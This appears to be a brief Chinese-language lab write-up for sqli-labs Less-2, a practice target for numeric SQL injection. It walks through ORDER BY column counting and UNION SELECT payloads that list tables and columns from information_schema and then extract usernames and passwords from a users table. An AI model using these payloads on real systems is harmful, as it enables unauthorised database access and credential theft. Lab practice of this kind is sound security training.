输入?id=1
' 进行试探,第二关数值型,没有字符串的单引号,所以输入单引号报错,
经试探?id=1 order by 5 --+ 如果是错误的数值,显示如下:
正确 的为: ?id=1 order by 3 --+
进行注入查看回显点:
?id=-1%20union select 1,2,3 --+
查看数据库:
查看表:
id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--+
查看列名:
/?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+
查看字段内容:
/sqli-labs/Less-2/?id=-1%20union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)%20from%20users--+
